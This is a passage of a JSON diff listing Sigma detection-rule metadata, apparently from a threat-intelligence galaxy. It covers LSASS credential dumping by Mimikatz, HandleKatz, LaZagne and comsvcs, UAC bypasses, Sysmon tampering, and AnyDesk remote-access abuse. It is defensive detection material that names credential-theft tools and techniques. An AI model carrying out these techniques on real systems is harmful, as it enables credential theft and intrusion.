(update)", + "creation_date": "2017/02/16", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; please add more filters" + ], + "filename": "proc_access_win_cred_dump_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" + ] + }, + "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "value": "Credential Dumping Tools Accessing LSASS Memory" + }, + { + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "meta": { + "author": "Christian Burkard, Tim Shelton", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess" + }, + { + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_hack_sysmonente.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage" + }, + { + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "meta": { + "author": "Bhabesh Raj (rule), @thefLinkk", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_handlekatz_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS Handle" + }, + { + "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_invoke_phantom.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess" + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "meta": { + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "creation_date": "2020/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" + ] + }, + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne" + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" + ] + }, + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection" + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface" + }, + { + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL" + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Samir Bousseaden, Michael Haag", + "creation_date": "2019/04/03", + "falsepositive": [ + "False positives are present when looking for 0x1410. Exclusions may be required." + ], + "filename": "proc_access_win_lsass_memdump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump" + }, + { + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Unlikely, since these tools shouldn't access lsass.exe at all" + ], + "filename": "proc_access_win_lsass_memdump_evasion.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes" + }, + { + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Rare programs that contain the word dump in their name and access lsass" + ], + "filename": "proc_access_win_lsass_memdump_indicators.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump" + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Florian Roth", + "creation_date": "2012/06/27", + "falsepositive": [ + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "filename": "proc_access_win_lsass_werfault.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS" + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "meta": { + "author": "John Lambert (tech), Florian Roth (rule)", + "creation_date": "2017/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process" + }, + { + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "meta": { + "author": "Patryk Prauze - ING Tech", + "creation_date": "2019/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ] + }, + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management" + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/13", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_rare_proc_access_lsass.yml", + "level": "medium", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on LSASS Access" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/27", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder" + }, + { + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "meta": { + "author": "Florent Labouyrie", + "creation_date": "2021/04/30", + "falsepositive": [ + "Non identified legit exectubale" + ], + "filename": "proc_access_win_svchost_cred_dump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" + ], + "tags": [ + "attack.t1548" + ] + }, + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump" + }, + { + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack" + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/kagancapar/CVE-2022-29072", + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess" + }, + { + "description": "Detection of unusual child processes by different system processes", + "meta": { + "author": "Semanur Guneysu @semanurtg, oscd.community", + "creation_date": "2020/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes" + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ] + }, + "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", + "value": "Abusing Windows Telemetry For Persistence" + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges" + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner" + }, + { + "description": "Detects the use of Advanced Port Scanner.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "filename": "proc_creation_win_advanced_port_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner" + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_alternate_data_streams.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "value": "Execute From Alternate Data Streams" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_anydesk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software" + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password" + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2021/08/06", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "filename": "proc_creation_win_anydesk_silent_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://support.anydesk.com/Automatic_Deployment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/20", + "falsepositive": [ + "Legitimate use of AnyDesk 